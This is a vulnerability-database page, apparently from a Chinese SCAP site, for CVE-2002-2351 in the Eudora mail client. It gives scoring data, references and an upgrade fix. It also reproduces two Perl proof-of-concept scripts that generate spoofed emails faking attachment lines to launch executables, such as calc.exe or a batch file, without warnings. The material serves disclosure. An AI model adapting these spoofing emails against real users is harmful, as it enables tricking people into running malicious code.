CVE-2002-2351
CVSS6.4
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:32:59
NMCOE    

[原文]Eudora 5.1 allows remote attackers to bypass security warnings and possibly execute arbitrary code via attachments with names containing a trailing "." (dot).


[CNNVD]Qualcomm Eudora文件附件欺骗漏洞(CNNVD-200212-459)

        Eudora 5.1版本存在漏洞。远程攻击者借助带有包含尾随"." (点)名称的附件绕过安全警告且可能执行任意代码。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-22 [对路径名的限制不恰当(路径遍历)]

- CPE (受影响的平台与产品)

cpe:/a:qualcomm:eudora:5.2.1
cpe:/a:qualcomm:eudora:5.1
cpe:/a:qualcomm:eudora:5.2
cpe:/a:qualcomm:eudora:6.0.1
cpe:/a:qualcomm:eudora:6.0
cpe:/a:qualcomm:eudora:6.1.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2351
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2351
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-459
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5432
(UNKNOWN)  BID  5432
http://www.eudora.com/download/eudora/windows/5.2/RelNotes.txt
(UNKNOWN)  CONFIRM  http://www.eudora.com/download/eudora/windows/5.2/RelNotes.txt

- 漏洞信息

Qualcomm Eudora文件附件欺骗漏洞
中危 输入验证
2002-12-31 00:00:00 2002-12-31 00:00:00
远程  
        Eudora 5.1版本存在漏洞。远程攻击者借助带有包含尾随"." (点)名称的附件绕过安全警告且可能执行任意代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (21695)

Qualcomm Eudora 5/6 File Attachment Spoofing Vulnerability (1) (EDBID:21695)
windows remote
2002-08-08 Verified
0 Paul Szabo
N/A [点击下载]
source: http://www.securityfocus.com/bid/5432/info

Eudora is reported to be prone to an issue which may allow attackers to spoof the file extension in an attachment. This may aid an attacker in enticing a user of the e-mail client into executing malicious content, and in avoiding generating warning messages.

It is possible to refer to other files or attachments in a message through specially formatted inline text. It has been demonstrated possible to misrepresent some aspects of files referenced in this manner. This may cause end users to make erroneous judgements about the nature of file attachments, and allow malicious attachments to bypass normal warning dialogs displayed when executable content is launched.

If an attachment path to an executable file has a single '.' character appended, warning messages will not be displayed. Attachments such as 'calc.exe.' may execute when launched without the requirement for further interaction. Additionally, an arbitrary file name may be specified by the attacker which will be displayed to the end user. If a filename such as 'readme.txt' is associated with a malicious, executable attachment, the user may make innacurate decisions about the risk associated with opening the attachment. If the specified file does not exist on the local system, the full path provided will be used to locate and launch a file, with no further warnings given.

Successful exploitation may require the attacker to know the full path to the attachment directory.

** A new version of Eudora is available however, reports suggest that the new version may still be affected.

** May 21, 2004 - Eudora version 6.1.1 has been released, however, it is reported that the new versions is vulnerable to this issue as well.

#!/usr/bin/perl --

use MIME::Base64;

print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.0 on Windows exploit\n";
print "MIME-Version: 1.0\n";
print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
print "\n";
print "This is a multi-part message in MIME format.\n";
print "--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";

print "Pipe the output of this script into:   sendmail -i victim\n";

print "\nQuestion: Besides In.mbx, Eudora 6.0 also keeps In.mbx.001 and
In.mbx.002 files. Any way to turn this wasteful feature off?\n";

print "\nWith spoofed attachments, we could 'steal' files if the message
was forwarded (not replied to).\n";

print "\nSending a long filename e.g.:\n";
print "Attachment Converted\r: \"\\AAA...AAA\"\n";
print "(with 250 or so repetitions of \"A\") makes Eudora crash.
Eudora is then unable to start, until the offending message is
removed from In.mbx (using some utility other than Eudora itself).
This buffer overflow can easily be made into an execute-any-code
exploit (but is not shown here for script kiddies).\n";

print "\nWithin plain-text email (or plain-text, inline MIME parts) embedded
CR=x0d characters get converted internally into a NUL=x00 and ignored,
so we can spoof \"attachment converted\" lines:\n";

print "\nThe following work fine (but are boring and/or put up warnings):\n";
print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";
print "Attachment Converted\r: c:\\winnt\\system32\\calc.exe\n";
print "(Note how JavaScript is done with IE, web with default browser Netscape)\n";
print "Attachment Converted\r: <A href=javascript:alert(%27hello%27)>hello.txt</a>\n";
print "Attachment Converted\r: <A href=http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx>web.txt</a>\n";
print "Attachment Converted\r: <A href=c:/winnt/system32/calc.exe>file.txt</a>\n";

print "\nIf we can guess the full path to the attach directory then can
change the name shown to anything we like, but get broken icon:\n";
print "Attachment Converted\r: <A href=H:/windows/.eudora/attach/calc>file.txt</a>\n";

print "\nCuteness value only:\n";
print "Attachment Converted\r: <A href=c:/winnt/system32/calc.exe>file1.txt</a> xyz <A href=c:/winnt/system32/calc.exe>file2.txt</a>\n";

print "\n<x-html>
With <b>HTML</b> <i>inclusions</i> we can do
<a href=c:/winnt/system32/calc.exe>file</a>,
<a href=\"http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\">http</a>
and
<a href=\"javascript:alert(\x27hello\x27)\">javascript</a>
references. Any way to exploit this?
</x-html>\n";

print "\n<x-rich>
Can also do RTF inclusions. Can this be abused?
</x-rich>\n";

print "\nThose <x-xyz></x-xyz> constructs allow spoofing
attachments easily, without embedded CR:\n\n";
print "HTML\n";
print "<x-html></x-html>Attachment Converted: \"xyz\"\n";
print "Rich\n";
print "<x-rich></x-rich>Attachment Converted: \"xyz\"\n";
print "Flowed\n";
print "<x-flowed></x-flowed>Attachment Converted: \"xyz\"\n";

print "\n";

print "\n--zzz\n";
print "Content-Type: text/plain; name=\"plain.txt\"\n";
print "Content-Transfer-Encoding: 7bit\n";
print "Content-Disposition: inline; filename=\"plain.txt\"\n";
print "\n";
print "Within a 'plain' attachment:\n";
print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";

print "\n--zzz\n";
print "Content-Type: text/plain; name=\"qp.txt\"\n";
print "Content-Transfer-Encoding: quoted-printable \n";
print "Content-Disposition: inline; filename=\"qp.txt\"\n";
print "\n";
print "Within quoted-printable encoded parts still need the embedded CR:\n";
print "=41ttachment=20=43onverted\r=3a \"c:\\winnt\\system32\\calc.exe\"\n";

print "\n--zzz\n";
print "Content-Type: text/plain; name=\"b64.txt\"\n";
print "Content-Transfer-Encoding: base64\n";
print "Content-Disposition: inline; filename=\"b64.txt\"\n";
print "\n";
$z = "Within base64 encoded (plain-text, inline) MIME parts, can spoof\r
without embedded CR (but line termination is CR-NL):\r
Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r\n";
print encode_base64($z);

print "\n--zzz--\n";
print "\n";		

- 漏洞信息 (21696)

Qualcomm Eudora 5/6 File Attachment Spoofing Vulnerability (2) (EDBID:21696)
windows remote
2002-08-08 Verified
0 Paul Szabo
N/A [点击下载]
source: http://www.securityfocus.com/bid/5432/info
 
Eudora is reported to be prone to an issue which may allow attackers to spoof the file extension in an attachment. This may aid an attacker in enticing a user of the e-mail client into executing malicious content, and in avoiding generating warning messages.
 
It is possible to refer to other files or attachments in a message through specially formatted inline text. It has been demonstrated possible to misrepresent some aspects of files referenced in this manner. This may cause end users to make erroneous judgements about the nature of file attachments, and allow malicious attachments to bypass normal warning dialogs displayed when executable content is launched.
 
If an attachment path to an executable file has a single '.' character appended, warning messages will not be displayed. Attachments such as 'calc.exe.' may execute when launched without the requirement for further interaction. Additionally, an arbitrary file name may be specified by the attacker which will be displayed to the end user. If a filename such as 'readme.txt' is associated with a malicious, executable attachment, the user may make innacurate decisions about the risk associated with opening the attachment. If the specified file does not exist on the local system, the full path provided will be used to locate and launch a file, with no further warnings given.
 
Successful exploitation may require the attacker to know the full path to the attachment directory.
 
** A new version of Eudora is available however, reports suggest that the new version may still be affected.
 
** May 21, 2004 - Eudora version 6.1.1 has been released, however, it is reported that the new versions is vulnerable to this issue as well.

#!/usr/bin/perl --

use MIME::Base64;

print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.1.1 on Windows spoof, LaunchProtect\n";
print "MIME-Version: 1.0\n";
print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
print "X-Use: Pipe the output of this script into:  sendmail -i victim\n\n";
print "This is a multi-part message in MIME format.\n";
print "--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";

print "With spoofed attachments, we could 'steal' files if the message
was forwarded (not replied to).\n";

#print "
#(Within plain-text email (or plain-text, inline MIME parts) embedded
#CR=x0d characters used to get converted internally into a NUL=x00 and
#ignored, so we could spoof \"attachment converted\" lines.
#At version 6.1.1, embedded CR seem to get converted into NL=x0a.)\n";

print "\nThe <x-xyz></x-xyz> constructs (x-html, x-rich or x-flowed)
allow spoofing attachments easily.
The following work fine (but put up warnings):\n";
print "<x-html></x-html>Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n";
print "<x-html></x-html>Attachment Converted: c:\\winnt\\system32\\calc.exe\n";
print "<x-html></x-html>Attachment Converted: <a href=c:/winnt/system32/calc.exe>file.exe</a>\n";
print "These have broken icons, but execute without warning:\n";
print "<x-html></x-html>Attachment Converted: \"c:\\winnt\\system32\\calc\"\n";
print "<x-html></x-html>Attachment Converted: c:\\winnt\\system32\\calc\n";
print "<x-html></x-html>Attachment Converted: <a href=c:/winnt/system32/calc>file</a>\n";

print "\n<x-html>
With <b>HTML</b> <i>inclusions</i> we can do
<a href=c:/winnt/system32/calc.exe>file.exe</a>
(get warning)
<br>and
<a href=c:/winnt/system32/calc>plain file</a>
(no warning) references.
<br>(Or can do
<a href=\"http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\">http</a>
and
<a href=\"javascript:alert(\x27hello\x27)\">javascript</a>
references; the latter
<br>seems to run with IE, regardless of default browser settings.).
</x-html>\n";

print "\n\n<x-rich>
Can also do RTF inclusions. Can that be abused?
</x-rich>\n\n";

print "\n--zzz\n";
print "Content-Type: text/plain; name=\"b64.txt\"\n";
print "Content-Transfer-Encoding: base64\n";
print "Content-Disposition: inline; filename=\"b64.txt\"\n";
print "\n";
$z = "Can no longer spoof attachments in quoted-printable parts, but\r
still can within base64 encoded (plain-text, inline) MIME parts:\r
Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r
Attachment Converted: \"c:\\winnt\\system32\\calc\"\r\n";
print encode_base64($z);

print "\n--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";

$X = 'README'; $Y = "$X.bat";
print "\n\n\nThe X - X.exe dichotomy: send a plain $X attachment:\n";
$z = "rem Funny joke\r\npause\r\n";
print "begin 600 $X\n", pack('u',$z), "`\nend\n";
print "\nand (in another message or after some blurb so is scrolled off in
another screenful) also send $Y. Clicking on $X does not
get it any more, but gets $Y and runs without any warning:\n";
$z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n";
print "begin 600 $Y\n", pack('u',$z), "`\nend\n";

#print "\nIf we can guess the full path to the attach directory then can
#change the name shown to anything we like, but get broken icon:\n";
#print "<x-html></x-html>Attachment Converted: attach\\README\n";
#print "<x-html></x-html>Attachment Converted: <a href=H:/windows/.eudora/attach/README>file.txt</a>\n";

#print "\nFunny: I thought that since version 6.0, LaunchProtect handled
#the X-X.exe dichotomy (in the attach directory only)...\n";

print "\n";
print "\n--zzz--\n";
print "\n";
		

- 漏洞信息

59466
Eudora Attachment Trailing Dot File Extension Security Warning Bypass
Remote / Network Access, Context Dependent Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2002-08-07 Unknow
Unknow 2002-11-01

- 解决方案

Upgrade to version 5.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站